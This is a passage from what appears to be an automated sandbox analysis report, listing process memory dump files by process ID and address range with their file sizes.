                                                        3.5MB

                                                      • memory/1056-343-0x00007FFDBA600000-0x00007FFDBA619000-memory.dmp
                                                        Filesize

                                                        100KB

                                                      • memory/1056-349-0x00007FFDB3D50000-0x00007FFDB3E08000-memory.dmp
                                                        Filesize

                                                        736KB

                                                      • memory/1056-348-0x00007FFDB7630000-0x00007FFDB765E000-memory.dmp
                                                        Filesize

                                                        184KB

                                                      • memory/1056-347-0x00007FFDB7660000-0x00007FFDB766D000-memory.dmp
                                                        Filesize

                                                        52KB

                                                      • memory/1056-346-0x00007FFDB7670000-0x00007FFDB7689000-memory.dmp
                                                        Filesize

                                                        100KB

                                                      • memory/1056-345-0x00007FFDA2850000-0x00007FFDA2BC5000-memory.dmp
                                                        Filesize

                                                        3.5MB

                                                      • memory/2320-117-0x0000015257860000-0x0000015257878000-memory.dmp
                                                        Filesize

                                                        96KB

                                                      • memory/2320-118-0x0000015271EA0000-0x0000015272062000-memory.dmp
                                                        Filesize

                                                        1.8MB

                                                      • memory/2320-185-0x0000015273470000-0x0000015273998000-memory.dmp
                                                        Filesize

                                                        5.2MB

                                                      • memory/2464-91-0x00007FFDA1D80000-0x00007FFDA2842000-memory.dmp
                                                        Filesize

                                                        10.8MB

                                                      • memory/2464-96-0x000002084CFA0000-0x000002084CFC2000-memory.dmp
                                                        Filesize

                                                        136KB

                                                      • memory/2464-217-0x00007FFDA1D80000-0x00007FFDA2842000-memory.dmp
                                                        Filesize

                                                        10.8MB

                                                      • memory/2464-97-0x00007FFDA1D80000-0x00007FFDA2842000-memory.dmp
                                                        Filesize

                                                        10.8MB

                                                      • memory/2464-84-0x00007FFDA1D83000-0x00007FFDA1D85000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/2480-206-0x000001BBA3610000-0x000001BBA3618000-memory.dmp
                                                        Filesize

                                                        32KB